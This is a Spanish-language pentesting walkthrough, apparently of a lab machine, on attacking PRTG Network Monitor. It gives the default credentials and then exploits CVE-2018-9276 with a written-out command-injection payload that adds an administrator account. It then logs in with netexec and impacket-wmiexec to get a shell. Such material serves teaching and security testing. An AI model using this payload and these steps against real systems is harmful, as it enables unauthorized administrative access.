2 minuto(s) estimado(s) de lectura
Hacking PRTG Network Monitor
Tipos de ataque
PRTG Network Monitor es una herramienta de monitoreo de red desarrollada por Paessler AG que permite supervisar en tiempo real el estado y rendimiento de dispositivos, servidores, aplicaciones y servicios dentro de una infraestructura TI. Utiliza protocolos como SNMP, WMI, NetFlow y HTTP para recopilar métricas sobre el uso del ancho de banda, la carga del CPU, la disponibilidad de servicios y otros indicadores críticos. Su interfaz gráfica facilita la visualización de alertas y paneles personalizados, lo que ayuda a los administradores a detectar fallos o cuellos de botella de forma temprana y a mantener la estabilidad y eficiencia de la red. Normalmente se puede encontrar en puertos web comunes como 80, 443 u 8080 en donde las credenciales por defecto son prtgadmin:prtgadmin o también se pueden buscar credenciales débiles.
CVE-2018-9276
Se descubrió un problema en PRTG Network Monitor antes de la versión 18.2.39 en que un atacante que tenga acceso a la consola web PRTG System Administrator con privilegios administrativos puede explotar una vulnerabilidad de inyección de comandos del sistema operativo (tanto en el servidor como en los dispositivos) enviando parámetros malformados en escenarios de gestión de sensores o notificaciones. En este caso se detecta una aplicación web con una versión vulnerable.
Una vez autenticados, debemos dirigirnos a “Setup”, luego a “Account Settings” y finalmente a “Notifications”.
En esta sección debemos añadir una notificación nueva.
Luego le asignaremos un nombre descriptivo a esta notificación. Después, descendemos hasta el apartado “Execute Program”, donde seleccionaremos la opción “Demo exe notification – outfile.ps1”. En el campo de parámetros, inyectaremos el comando que nos permita crear un nuevo usuario con privilegios de administrador y guardaremos los cambios.
test.txt;net user pwned Prueba_123! /add;net localgroup administrators pwned /add
Finalmente validamos que se haya creado correctamente la notificación y comprobamos las credenciales con netexec.
Si no funciona, manualmente debemos enviar una prueba de la notificación.
┌──(root㉿nptg)-[/prtg]
└─# netexec smb 10.129.201.50 -u 'pwned' -p 'Prueba_123!'
SMB 10.129.201.50 445 APP03 [*] Windows 10 / Server 2019 Build 17763 x64 (name:APP03) (domain:APP03) (signing:False) (SMBv1:False)
SMB 10.129.201.50 445 APP03 [+] APP03\pwned:Prueba_123! (Pwn3d!)
Para acceder con este usuario podemos usar la herrmienta wmiexec de la siguiente forma:
┌──(root㉿nptg)-[/prtg]
└─# impacket-wmiexec 'pwned':'Prueba_123!'@10.129.201.50
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
app03\pwned
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 4695-E565
Directory of C:\
10/11/2021 09:19 AM 1,024 .rnd
08/16/2021 06:42 PM <DIR> inetpub
09/28/2021 05:39 PM <DIR> loot
09/14/2018 11:19 PM <DIR> PerfLogs
10/11/2021 09:22 AM <DIR> Program Files
08/27/2021 12:30 PM <DIR> Program Files (x86)
08/16/2021 06:43 PM <DIR> Users
11/12/2025 04:45 PM <DIR> Windows
1 File(s) 1,024 bytes
7 Dir(s) 24,496,431,104 bytes free
C:\>





